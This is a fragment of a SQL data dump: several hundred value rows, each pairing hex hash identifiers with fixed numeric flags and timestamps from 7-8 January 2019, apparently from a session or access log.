(47158, '1a5ef3a63a6283abd51e82b5b9ac6f54', '1afdff054a155e14', 0, 2, 1, '2019-01-07 06:13:51'),
(47159, '1a5ef3a63a6283abd51e82b5b9ac6f54', '1afdff054a155e14', 0, 2, 1, '2019-01-07 06:19:43'),
(47160, '1a5ef3a63a6283abd51e82b5b9ac6f54', '1afdff054a155e14', 0, 2, 1, '2019-01-07 06:20:01'),
(47161, '1a5ef3a63a6283abd51e82b5b9ac6f54', '1afdff054a155e14', 0, 2, 1, '2019-01-07 06:31:01'),
(47162, '60f003cd21be4bae40314dce661470a1', 'e38fbc76ae580892', 0, 2, 1, '2019-01-07 07:17:48'),
(47163, '60f003cd21be4bae40314dce661470a1', 'e38fbc76ae580892', 0, 2, 1, '2019-01-07 07:18:28'),
(47164, 'b58a798a291e93b5f1f6cac018f9d018', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-07 07:32:23'),
(47165, '2687fd5bb9770f9c079ea072fdcbe78f', '2cbb50389fbed3c5', 0, 2, 1, '2019-01-07 07:41:36'),
(47166, 'd83db30336b754ea8a1c825ea43643f6', '8d560ad7723df7f0', 0, 2, 1, '2019-01-07 08:19:12'),
(47167, '4efde471252e99d204af963de0086abd', '3e166713e91e6277', 0, 2, 1, '2019-01-07 08:35:43'),
(47168, '78d8072ce3d20b06cd68c5465db90aa2', '7c5bcf99f2070582', 0, 2, 1, '2019-01-07 08:51:03'),
(47169, '78d8072ce3d20b06cd68c5465db90aa2', '7c5bcf99f2070582', 0, 2, 1, '2019-01-07 08:51:15'),
(47170, '5e03131c8d9c06058bd0f2d479e941fa', '17d608f533802337', 0, 2, 1, '2019-01-07 09:01:10'),
(47171, '88134218f1089e6eba6265b7d9e88566', 'a0d90718d84a1587', 0, 2, 1, '2019-01-07 09:29:54'),
(47172, '88134218f1089e6eba6265b7d9e88566', 'a0d90718d84a1587', 0, 2, 1, '2019-01-07 09:30:18'),
(47173, '519e760d961c62a79c99f149dda2a23f', '2d7521c47865a303', 0, 2, 1, '2019-01-07 09:37:23'),
(47174, '88574a36c25c91eaa8de06a26975f4ea', '08a722ff5931e162', 0, 2, 1, '2019-01-07 09:47:28'),
(47175, '88574a36c25c91eaa8de06a26975f4ea', '08a722ff5931e162', 0, 2, 1, '2019-01-07 09:47:36'),
(47176, 'e1a22f461306946cc4cc76d2c67340f8', '414aeb9808232ddd', 0, 2, 1, '2019-01-07 09:53:18'),
(47177, 'a60579704f3f82345f617ad32175e08b', 'a1c6674e2d316581', 0, 2, 1, '2019-01-07 09:57:16'),
(47178, '28855c9c3258cd20d90f997de5cae7d4', 'e74fad8619fd99a5', 0, 2, 1, '2019-01-07 09:58:29'),
(47179, '88134218f1089e6eba6265b7d9e88566', 'a0d90718d84a1587', 0, 2, 1, '2019-01-07 10:07:53'),
(47180, '90681aa537fa69c84f380b4b05523fd3', '9e3af052f0debf1f', 0, 2, 1, '2019-01-07 10:20:02'),
(47181, '90681aa537fa69c84f380b4b05523fd3', '9e3af052f0debf1f', 0, 2, 1, '2019-01-07 10:26:01'),
(47182, '00d3bda8b11b5fcabb9b4703e8d44a73', '069dc5451d70f372', 0, 2, 1, '2019-01-07 10:36:44'),
(47183, '82b2ccf2495848d8c6404f24618659d0', 'e8156e8ee3bad33d', 0, 2, 1, '2019-01-07 10:40:57'),
(47184, '82b2ccf2495848d8c6404f24618659d0', 'e8156e8ee3bad33d', 0, 2, 1, '2019-01-07 11:24:58'),
(47185, '82b2ccf2495848d8c6404f24618659d0', 'e8156e8ee3bad33d', 0, 2, 1, '2019-01-07 11:26:15'),
(47186, '486cdb89754deca1b25b528cbb2b128d', '183081e8ab354256', 0, 2, 1, '2019-01-07 11:28:55'),
(47187, '486cdb89754deca1b25b528cbb2b128d', '183081e8ab354256', 0, 2, 1, '2019-01-07 11:29:42'),
(47188, '486cdb89754deca1b25b528cbb2b128d', '183081e8ab354256', 0, 2, 1, '2019-01-07 11:29:51'),
(47189, 'bc4b7b63d5a5e9056b14bb8b8d7ed7a6', '4acf51b64a60ddd9', 0, 2, 1, '2019-01-07 11:40:14'),
(47190, '225b12ae6be4c08c21ba10a206ef1c0d', 'd7a959ad4fe5a093', 0, 2, 1, '2019-01-07 11:40:36'),
(47191, 'ae4bfad73506e6cbb7bfa460848e4a4b', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-07 12:13:34'),
(47192, '1dfb5ac70894f8a32d177761695133fb', '846ebbc16c331d47', 0, 2, 1, '2019-01-07 12:15:41'),
(47193, '68b7153ad5190e85805232a403de66bf', 'b58e4f885738dd6f', 0, 2, 1, '2019-01-07 12:17:34'),
(47194, '68b7153ad5190e85805232a403de66bf', 'b58e4f885738dd6f', 0, 2, 1, '2019-01-07 12:22:15'),
(47195, '68b7153ad5190e85805232a403de66bf', 'b58e4f885738dd6f', 0, 2, 1, '2019-01-07 12:22:23'),
(47196, '68b7153ad5190e85805232a403de66bf', 'b58e4f885738dd6f', 0, 2, 1, '2019-01-07 12:22:53'),
(47197, '68b7153ad5190e85805232a403de66bf', 'b58e4f885738dd6f', 0, 2, 1, '2019-01-07 12:23:09'),
(47198, '68b7153ad5190e85805232a403de66bf', 'b58e4f885738dd6f', 0, 2, 1, '2019-01-07 12:23:34'),
(47199, 'bf841e29d8bdfea5db1729eef131b774', 'b317e49ba337f683', 0, 2, 1, '2019-01-07 12:41:14'),
(47200, 'b8bd5115e0e50559471c62dc37ee2992', 'a9d8ee5cf9fdb124', 0, 2, 1, '2019-01-07 12:41:15'),
(47201, '165840a92d7231470add217ca0bb1dcc', 'd0d65655c8fe9985', 0, 2, 1, '2019-01-07 12:56:40'),
(47202, '165840a92d7231470add217ca0bb1dcc', 'd0d65655c8fe9985', 0, 2, 1, '2019-01-07 12:57:20'),
(47203, '49b2c3f6e27b6cbd3f5d405a0b03bcd2', '4c38a2f2118e4994', 0, 2, 1, '2019-01-07 13:02:47'),
(47204, '49b2c3f6e27b6cbd3f5d405a0b03bcd2', '4c38a2f2118e4994', 0, 2, 1, '2019-01-07 13:03:10'),
(47205, 'aa9274c98d09adc1198b108b583c65e9', '6fd3677003643e9f', 0, 2, 1, '2019-01-07 13:29:55'),
(47206, '49d94a8f992ea86297e96b4ad740ca05', '0c414c85d9bd8eb3', 0, 2, 1, '2019-01-07 13:54:37'),
(47207, 'ce8fad04cba839e6af82ecb34aeacb80', '6c6ffedc658d8412', 0, 2, 1, '2019-01-07 14:18:51'),
(47208, 'd946fc5836327a4066ca9575238c652d', 'e475b63a34501b04', 0, 2, 1, '2019-01-07 14:19:57'),
(47209, '9d45360dcef3c2a881f112024adecf40', '81070426ca16cd24', 0, 2, 1, '2019-01-07 14:21:11'),
(47210, 'd946fc5836327a4066ca9575238c652d', 'e475b63a34501b04', 0, 2, 1, '2019-01-07 14:24:28'),
(47211, 'd946fc5836327a4066ca9575238c652d', 'e475b63a34501b04', 0, 2, 1, '2019-01-07 14:25:02'),
(47212, '5388ea9abda377e425d914378075d3b7', 'b5dea531bb51b38d', 0, 2, 1, '2019-01-07 14:48:42'),
(47213, '097125422bef34b81d5457ba7bf52a4d', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-07 15:12:49'),
(47214, '097125422bef34b81d5457ba7bf52a4d', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-07 15:13:21'),
(47215, '097125422bef34b81d5457ba7bf52a4d', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-07 15:13:44'),
(47216, '5fd5db46fcf9255a5952cb87cdf9f831', '366a3d13dbaa0dc7', 0, 2, 1, '2019-01-07 15:39:31'),
(47217, '3d1f72f0e67c0a06ed2e2b3a81a71781', '846ebbc16c331d47', 0, 2, 1, '2019-01-07 15:45:26'),
(47218, '619fcf1f902ce55b55d24287dcfd3b7e', '2ea7201b0e939b00', 0, 2, 1, '2019-01-07 15:50:36'),
(47219, '519e760d961c62a79c99f149dda2a23f', '2d7521c47865a303', 0, 2, 1, '2019-01-07 15:55:14'),
(47220, '519e760d961c62a79c99f149dda2a23f', '2d7521c47865a303', 0, 2, 1, '2019-01-07 15:56:06'),
(47221, '98f6789eda7daa07a159b4f028f771b4', '83bb13387505b354', 0, 2, 1, '2019-01-07 17:15:17'),
(47222, '7fe96ba0bf452242acbd2532445f91b4', '1be183b8e7641609', 0, 2, 1, '2019-01-07 17:20:28'),
(47223, '8c3296b4700729458a356599894130b3', 'c123e74a1d22036a', 0, 2, 1, '2019-01-07 17:30:32'),
(47224, '8c3296b4700729458a356599894130b3', 'c123e74a1d22036a', 0, 2, 1, '2019-01-07 17:43:42'),
(47225, '8c3296b4700729458a356599894130b3', 'c123e74a1d22036a', 0, 2, 1, '2019-01-07 17:44:17'),
(47226, '8c3296b4700729458a356599894130b3', 'c123e74a1d22036a', 0, 2, 1, '2019-01-07 17:44:30'),
(47227, '8c3296b4700729458a356599894130b3', 'c123e74a1d22036a', 0, 2, 1, '2019-01-07 17:46:23'),
(47228, '9552e6f2c38af16f515eec8e8b0869e5', '961e23fa7f84e6f6', 0, 2, 1, '2019-01-07 18:30:22'),
(47229, 'dcae0a8e0d927c58f8afcda1686440b9', '5bd0aeefa5057666', 0, 2, 1, '2019-01-07 18:30:52'),
(47230, 'b58a798a291e93b5f1f6cac018f9d018', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-07 18:48:13'),
(47231, '1b9737e55685d9874253cd275e509bcd', '72dc0850b32e286c', 0, 2, 1, '2019-01-07 20:37:35'),
(47232, 'f232a6d5caa6097e173c512056250fb9', 'd01854f1f989f3de', 0, 2, 1, '2019-01-07 21:12:28'),
(47233, '211227ddde39bd378f79bd468929b551', 'd04c5d81b6e92e1c', 0, 2, 1, '2019-01-07 21:21:32'),
(47234, 'a3f3e5e8ef9d92b40e03d2a2202af054', '7ad576b7a715125d', 0, 2, 1, '2019-01-07 21:26:49'),
(47235, 'a3f3e5e8ef9d92b40e03d2a2202af054', '7ad576b7a715125d', 0, 2, 1, '2019-01-07 21:28:16'),
(47236, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:39:05'),
(47237, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:39:13'),
(47238, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:39:41'),
(47239, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:39:50'),
(47240, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:40:28'),
(47241, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:40:36'),
(47242, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:41:00'),
(47243, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2019-01-07 21:46:13'),
(47244, 'd11bf75818d6595741b4f96f066db1ea', 'fcc9a7d14888bba6', 0, 2, 1, '2019-01-07 21:47:41'),
(47245, 'ff2f0b26814a3bb38a590e4c616a4f70', 'f210760490ca9ae6', 0, 2, 1, '2019-01-07 21:57:11'),
(47246, 'ff2f0b26814a3bb38a590e4c616a4f70', 'f210760490ca9ae6', 0, 2, 1, '2019-01-07 21:58:42'),
(47247, 'ff2f0b26814a3bb38a590e4c616a4f70', 'f210760490ca9ae6', 0, 2, 1, '2019-01-07 21:59:36'),
(47248, '0e3b258ebe4d48bd43c84ae57847ee0c', 'be8d18145c6c4831', 0, 2, 1, '2019-01-07 22:00:02'),
(47249, '059d2cc81a7e7e0216f804223ecc4b18', '99e1118d3e257d32', 0, 2, 1, '2019-01-07 22:13:49'),
(47250, '0e3b258ebe4d48bd43c84ae57847ee0c', 'be8d18145c6c4831', 0, 2, 1, '2019-01-07 22:32:57'),
(47251, 'd6e91285222005681f957f055e89e140', '13353e029e6744a7', 0, 2, 1, '2019-01-07 23:08:24'),
(47252, 'd6e91285222005681f957f055e89e140', '13353e029e6744a7', 0, 2, 1, '2019-01-07 23:09:01'),
(47253, 'd6e91285222005681f957f055e89e140', '13353e029e6744a7', 0, 2, 1, '2019-01-07 23:12:09'),
(47254, 'd6e91285222005681f957f055e89e140', '13353e029e6744a7', 0, 2, 1, '2019-01-07 23:12:31'),
(47255, 'd6e91285222005681f957f055e89e140', '13353e029e6744a7', 0, 2, 1, '2019-01-07 23:13:04'),
(47256, 'e7b871e5b0fe4a69597e3f8f08d10943', 'c89c8fc44e39c269', 0, 2, 1, '2019-01-07 23:19:19'),
(47257, 'e7b871e5b0fe4a69597e3f8f08d10943', 'c89c8fc44e39c269', 0, 2, 1, '2019-01-07 23:21:52'),
(47258, '5a98617cba6a4d7801caa29603e380aa', '36146e1f6045b395', 0, 2, 1, '2019-01-07 23:49:03'),
(47259, 'd6e91285222005681f957f055e89e140', '13353e029e6744a7', 0, 2, 1, '2019-01-08 00:18:30'),
(47260, 'feb157b0ad3254abdf3399b77a704ecd', 'de2d71a9e58d2f8a', 0, 2, 1, '2019-01-08 00:34:31'),
(47261, 'ccc899eab8d0e83a56b817218e56a5c8', '2034f09284a4c7ca', 0, 2, 1, '2019-01-08 00:56:05'),
(47262, 'b3c238b0f8d1dce6a9608a8fa4b69b40', '846ebbc16c331d47', 0, 2, 1, '2019-01-08 03:09:48'),
(47263, '6d88c26ff0c6b11945c23a2f72bdc239', '6c3f4cb08ebbdd38', 0, 2, 1, '2019-01-08 04:08:36'),
(47264, '6d88c26ff0c6b11945c23a2f72bdc239', '6c3f4cb08ebbdd38', 0, 2, 1, '2019-01-08 04:10:07'),
(47265, '50361a5ab12796afe0f3a4839d9ee600', '9480fb864e6c8b68', 0, 2, 1, '2019-01-08 04:21:59'),
(47266, '0ed1eb4dfa16cc32064441a402362d8f', '960d12b6c14f65ca', 0, 2, 1, '2019-01-08 04:33:31'),
(47267, 'f25b3fc9fddc5e1f771929fe791cb281', 'bf5e92795ed1f141', 0, 2, 1, '2019-01-08 05:26:54'),
(47268, '422c3b35350b0fdd42354d9e595c8b9b', '636e7b0d04c1b0de', 0, 2, 1, '2019-01-08 05:34:24'),
(47269, '30cb39b145a03cd28340910dc88c21b0', '4a13464adbcaa1b6', 0, 2, 1, '2019-01-08 05:42:53'),
(47270, '683a27e43ce2b8cde603c7d1b78320d6', '25a58e7920a9c568', 0, 2, 1, '2019-01-08 05:50:53'),
(47271, 'c47ce76baa7c32e342c28281baa4bd68', 'da0835c39469f75f', 0, 2, 1, '2019-01-08 06:32:07'),
(47272, 'bb472111497e038bc2693385d6da8956', 'a0a0e5992ed4ea39', 0, 2, 1, '2019-01-08 06:55:19'),
(47273, 'bb472111497e038bc2693385d6da8956', 'a0a0e5992ed4ea39', 0, 2, 1, '2019-01-08 06:58:03'),
(47274, 'c3618f5b28fc63ff0e0a0f547eabf9a9', '22905843105c275f', 0, 2, 1, '2019-01-08 07:28:09'),
(47275, 'c3618f5b28fc63ff0e0a0f547eabf9a9', '22905843105c275f', 0, 2, 1, '2019-01-08 07:31:24'),
(47276, 'c3618f5b28fc63ff0e0a0f547eabf9a9', '22905843105c275f', 0, 2, 1, '2019-01-08 07:32:05'),
(47277, 'c3618f5b28fc63ff0e0a0f547eabf9a9', '22905843105c275f', 0, 2, 1, '2019-01-08 07:32:56'),
(47278, 'b3c238b0f8d1dce6a9608a8fa4b69b40', '846ebbc16c331d47', 0, 2, 1, '2019-01-08 07:37:33'),
(47279, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 07:41:54'),
(47280, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 07:42:26'),
(47281, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 07:46:18'),
(47282, 'a60579704f3f82345f617ad32175e08b', 'a1c6674e2d316581', 0, 2, 1, '2019-01-08 08:29:24'),
(47283, '5388ea9abda377e425d914378075d3b7', 'b5dea531bb51b38d', 0, 2, 1, '2019-01-08 08:44:23'),
(47284, '26bf7b9757ce0c50655072c3c121fb98', '735a8d49dd2620d9', 0, 2, 1, '2019-01-08 08:49:12'),
(47285, '3681501f94d26da27ad93783638bbf4b', '2955da4d8adca62b', 0, 2, 1, '2019-01-08 08:49:13'),
(47286, '608ce091e1d85e734f5f183be349c6f9', 'be8d18145c6c4831', 0, 2, 1, '2019-01-08 08:50:03'),
(47287, 'a9dff3fafeb0f1d1ccc2a514876fddad', '103b677b95c717ad', 0, 2, 1, '2019-01-08 09:49:01'),
(47288, 'a9dff3fafeb0f1d1ccc2a514876fddad', '103b677b95c717ad', 0, 2, 1, '2019-01-08 09:49:10'),
(47289, '1a348c92cd4434e1b976f7a1194d9f88', '696348e046dfa07f', 0, 2, 1, '2019-01-08 10:20:57'),
(47290, '0113f0693a85217db334dcecac883a07', '0884b52e8f59d021', 0, 2, 1, '2019-01-08 10:20:59'),
(47291, 'db69b7e25489aabccc337a933feda307', '5593829dca0c2e6a', 0, 2, 1, '2019-01-08 10:23:35'),
(47292, 'b3e5608b577aab8f4a68934a23476238', 'a41d7f206a6e7693', 0, 2, 1, '2019-01-08 10:40:13'),
(47293, '8ea7bde2b69229428862f2722aed73f0', '4c38a2f2118e4994', 0, 2, 1, '2019-01-08 12:05:55'),
(47294, '8ea7bde2b69229428862f2722aed73f0', '4c38a2f2118e4994', 0, 2, 1, '2019-01-08 12:06:10'),
(47295, '8ea7bde2b69229428862f2722aed73f0', '4c38a2f2118e4994', 0, 2, 1, '2019-01-08 12:06:20'),
(47296, '8ea7bde2b69229428862f2722aed73f0', '4c38a2f2118e4994', 0, 2, 1, '2019-01-08 12:06:30'),
(47297, '8ea7bde2b69229428862f2722aed73f0', '4c38a2f2118e4994', 0, 2, 1, '2019-01-08 12:06:45'),
(47298, 'f544442b758d2c2623226ede066e75bb', 'c1d1d5101fb35818', 0, 2, 1, '2019-01-08 12:09:16'),
(47299, '8ea7bde2b69229428862f2722aed73f0', '4c38a2f2118e4994', 0, 2, 1, '2019-01-08 12:09:50'),
(47300, '8ea7bde2b69229428862f2722aed73f0', '4c38a2f2118e4994', 0, 2, 1, '2019-01-08 12:12:30'),
(47301, '72e764e55790cfdef9f79f0e586bd0af', 'e811532d4fba8e9c', 0, 2, 1, '2019-01-08 13:06:04'),
(47302, '34f1c1fa3483f39259c3b878fd83f610', '9ab76b2756ba7128', 0, 2, 1, '2019-01-08 13:21:30'),
(47303, 'df0ecab19cdaa4099d55d1cd699deea4', '51597bf7a3572f16', 0, 2, 1, '2019-01-08 13:21:55'),
(47304, '738a19f9230d6b424bfc0bf44953d6da', '5953064e794bda3d', 0, 2, 1, '2019-01-08 13:44:09'),
(47305, '738a19f9230d6b424bfc0bf44953d6da', '5953064e794bda3d', 0, 2, 1, '2019-01-08 13:45:13'),
(47306, '738a19f9230d6b424bfc0bf44953d6da', '5953064e794bda3d', 0, 2, 1, '2019-01-08 13:49:05'),
(47307, '6d0d8879a515524b9d20b2475269baab', '68f8c24ff651cab7', 0, 2, 1, '2019-01-08 14:07:22'),
(47308, '13e94376df283af3077a98e6cf120e6c', '2cbb50389fbed3c5', 0, 2, 1, '2019-01-08 14:28:56'),
(47309, 'd6a36b3bdcfc4169a4c708fa83ce924e', '2034f09284a4c7ca', 0, 2, 1, '2019-01-08 15:06:02'),
(47310, 'f1ba01135350e5ebe75dc359629064da', '1c68b977b911188c', 0, 2, 1, '2019-01-08 15:38:04'),
(47311, 'f1ba01135350e5ebe75dc359629064da', '1c68b977b911188c', 0, 2, 1, '2019-01-08 15:40:10'),
(47312, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 15:40:48'),
(47313, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 15:41:26'),
(47314, '94c15aa8ee280db51b94727abab76b40', '7501b42c35accff7', 0, 2, 1, '2019-01-08 15:44:35'),
(47315, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 15:50:13'),
(47316, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 15:50:33'),
(47317, 'ac21814d415698394a62783718a0dfb6', '2034f09284a4c7ca', 0, 2, 1, '2019-01-08 15:52:21'),
(47318, 'a2f3f4f0e048ea28305272e9fd8fbae4', 'f25190522d0654cc', 0, 2, 1, '2019-01-08 15:56:47'),
(47319, 'a2f3f4f0e048ea28305272e9fd8fbae4', 'f25190522d0654cc', 0, 2, 1, '2019-01-08 15:57:01'),
(47320, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 15:57:42'),
(47321, '58676ef7eb6064052d0a0fcfff9d3504', 'e166007f2708bfc2', 0, 2, 1, '2019-01-08 15:59:54'),
(47322, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:00:03'),
(47323, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:00:15'),
(47324, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:00:40'),
(47325, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:01:17'),
(47326, '65eda33957d298ca8dac7a0d50bdf3b7', '4b8272c521136738', 0, 2, 1, '2019-01-08 16:03:09'),
(47327, '6302e3cf75f5d79cf85ae58b26a0caf2', 'f25190522d0654cc', 0, 2, 1, '2019-01-08 16:03:11'),
(47328, 'eceffbb7107f6b1174b6bc3ac54254ae', '9968c5be4a7971a2', 0, 2, 1, '2019-01-08 16:03:25'),
(47329, 'fbf932076057a845de3b75a58e8a37b3', '32b169e936bbe5df', 0, 2, 1, '2019-01-08 16:04:30'),
(47330, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:04:35'),
(47331, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:04:36'),
(47332, 'eceffbb7107f6b1174b6bc3ac54254ae', '9968c5be4a7971a2', 0, 2, 1, '2019-01-08 16:04:58'),
(47333, '9cd544b10b2a6956782637a995f6145c', '6614925144691ae6', 0, 2, 1, '2019-01-08 16:05:22'),
(47334, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:06:01'),
(47335, '58676ef7eb6064052d0a0fcfff9d3504', 'e166007f2708bfc2', 0, 2, 1, '2019-01-08 16:06:07'),
(47336, '9cd544b10b2a6956782637a995f6145c', '6614925144691ae6', 0, 2, 1, '2019-01-08 16:06:12'),
(47337, '58676ef7eb6064052d0a0fcfff9d3504', 'e166007f2708bfc2', 0, 2, 1, '2019-01-08 16:06:16'),
(47338, '65eda33957d298ca8dac7a0d50bdf3b7', '4b8272c521136738', 0, 2, 1, '2019-01-08 16:06:22'),
(47339, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:06:27'),
(47340, 'becb1ba599492f3fe7ee780c8c48c491', '80d0e70110ede451', 0, 2, 1, '2019-01-08 16:06:28'),
(47341, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:06:41'),
(47342, 'becb1ba599492f3fe7ee780c8c48c491', '80d0e70110ede451', 0, 2, 1, '2019-01-08 16:06:42'),
(47343, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 16:07:02'),
(47344, 'a3533ad972886eb2619d80175204b04b', '67e0e624afed8067', 0, 2, 1, '2019-01-08 16:07:40'),
(47345, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:07:46'),
(47346, 'a3533ad972886eb2619d80175204b04b', '67e0e624afed8067', 0, 2, 1, '2019-01-08 16:07:55'),
(47347, 'e0c9eae7ea5ccee9da7170671b91c2e7', 'a68a3b7093fc3903', 0, 2, 1, '2019-01-08 16:08:01'),
(47348, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:08:14'),
(47349, 'a3533ad972886eb2619d80175204b04b', '67e0e624afed8067', 0, 2, 1, '2019-01-08 16:08:22'),
(47350, 'e0c9eae7ea5ccee9da7170671b91c2e7', 'a68a3b7093fc3903', 0, 2, 1, '2019-01-08 16:08:29'),
(47351, '6e47d720b5d52e943892c10f856a5737', 'f25822a8344d8047', 0, 2, 1, '2019-01-08 16:08:41'),
(47352, '5864657d18d4b0a6ff84fcfa0179acd2', '86f971d8c824d84a', 0, 2, 1, '2019-01-08 16:08:45'),
(47353, 'f1ba01135350e5ebe75dc359629064da', '1c68b977b911188c', 0, 2, 1, '2019-01-08 16:08:54'),
(47354, 'f1ba01135350e5ebe75dc359629064da', '1c68b977b911188c', 0, 2, 1, '2019-01-08 16:09:04'),
(47355, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:09:44'),
(47356, '5864657d18d4b0a6ff84fcfa0179acd2', '86f971d8c824d84a', 0, 2, 1, '2019-01-08 16:10:09'),
(47357, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2019-01-08 16:10:30'),
(47358, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-08 16:10:31'),
(47359, 'fbf932076057a845de3b75a58e8a37b3', '32b169e936bbe5df', 0, 2, 1, '2019-01-08 16:10:42'),
(47360, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:10:52'),
(47361, '938bb9648b1a9333f943bdcabca3cdfe', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-08 16:10:54'),
(47362, '9acfbfb100693e051c205211ec66de30', 'a5fdae05dcf0ab89', 0, 2, 1, '2019-01-08 16:11:17'),
(47363, '5864657d18d4b0a6ff84fcfa0179acd2', '86f971d8c824d84a', 0, 2, 1, '2019-01-08 16:11:27'),
(47364, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 16:11:44'),
(47365, 'a3533ad972886eb2619d80175204b04b', '67e0e624afed8067', 0, 2, 1, '2019-01-08 16:11:54'),
(47366, '18dbc34bc13b93870ba7a08641c3b2b3', '34c47e13358cead7', 0, 2, 1, '2019-01-08 16:12:39'),
(47367, 'd76d62a222a9b6821baec76bc7c2618b', 'a8526f6e757f5fda', 0, 2, 1, '2019-01-08 16:14:48'),
(47368, '94c15aa8ee280db51b94727abab76b40', '7501b42c35accff7', 0, 2, 1, '2019-01-08 16:15:14'),
(47369, '5864657d18d4b0a6ff84fcfa0179acd2', '86f971d8c824d84a', 0, 2, 1, '2019-01-08 16:15:38'),
(47370, 'f1ba01135350e5ebe75dc359629064da', '1c68b977b911188c', 0, 2, 1, '2019-01-08 16:19:12'),
(47371, '938bb9648b1a9333f943bdcabca3cdfe', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-08 16:19:15'),
(47372, 'f85412f246fa24eee22318f7416f4c4c', 'c020abbb40884763', 0, 2, 1, '2019-01-08 16:19:59'),
(47373, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:20:20'),
(47374, 'fbf932076057a845de3b75a58e8a37b3', '32b169e936bbe5df', 0, 2, 1, '2019-01-08 16:20:21'),
(47375, '5864657d18d4b0a6ff84fcfa0179acd2', '86f971d8c824d84a', 0, 2, 1, '2019-01-08 16:20:41'),
(47376, '938bb9648b1a9333f943bdcabca3cdfe', 'd11c71184ec28f6f', 0, 2, 1, '2019-01-08 16:21:42'),
(47377, '58676ef7eb6064052d0a0fcfff9d3504', 'e166007f2708bfc2', 0, 2, 1, '2019-01-08 16:24:12'),
(47378, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:24:52'),
(47379, 'd8d2e43aaa8a48816e7512443a8cd0c2', 'df27b9a2919a8206', 0, 2, 1, '2019-01-08 16:25:34'),
(47380, '9539cca7a072664f2def6a6a3643e999', '0f82ee3c80278677', 0, 2, 1, '2019-01-08 16:26:42'),
(47381, 'a3533ad972886eb2619d80175204b04b', '67e0e624afed8067', 0, 2, 1, '2019-01-08 16:26:54'),
(47382, '0c805c6cc394b5b89a337f68e104b9e8', '29608a328df169fa', 0, 2, 1, '2019-01-08 16:27:32'),
(47383, '5481ebd5d59ae1c4004e0ef91e379307', 'cad202a09758cb3a', 0, 2, 1, '2019-01-08 16:28:00'),
(47384, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:28:05'),
(47385, '5864657d18d4b0a6ff84fcfa0179acd2', '86f971d8c824d84a', 0, 2, 1, '2019-01-08 16:28:16'),
(47386, 'f7d8d4787a7fbd6ae6f6d265ce836fce', 'c1afa73671a6ae95', 0, 2, 1, '2019-01-08 16:29:11'),
(47387, 'c95ff2a15d5e0e2e05485a30a757c0c4', '8c117e9ade9703d1', 0, 2, 1, '2019-01-08 16:32:06'),
(47388, '3142cd15f699d296bc25c5120ccc07ab', '5ec2e5453a24b8d5', 0, 2, 1, '2019-01-08 16:32:50'),
